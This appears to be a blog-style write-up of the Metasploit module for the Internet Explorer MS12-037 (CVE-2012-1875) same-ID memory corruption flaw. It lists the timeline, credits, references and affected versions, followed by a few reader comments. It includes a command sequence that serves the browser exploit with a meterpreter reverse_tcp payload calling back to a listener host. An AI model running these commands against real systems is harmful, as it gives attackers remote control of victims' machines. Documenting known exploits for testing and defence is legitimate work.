Timeline :
Vulnerability found exploited in the wild
Public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-13
PoC provided by :
Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez
Reference(s) :
MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Tested on Windows XP Pro SP3 with :
Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP
Description :
This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment, this module targets IE8 on Windows XP SP3, using heap massaging plus a heap spray, as exploited in the wild.
Commands :
use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid
Are you sure that you have removed KB2699988, which is the MS12-037 patch?
Hello
Exploit is not running
I tested an XP SP3 on Internet Explorer 8 (8.0.6001.18702)
What is this msvcrt ROP?
My IE8 crashed.
Another reason to ditch Windows XP and/or use EMET 2.0 🙂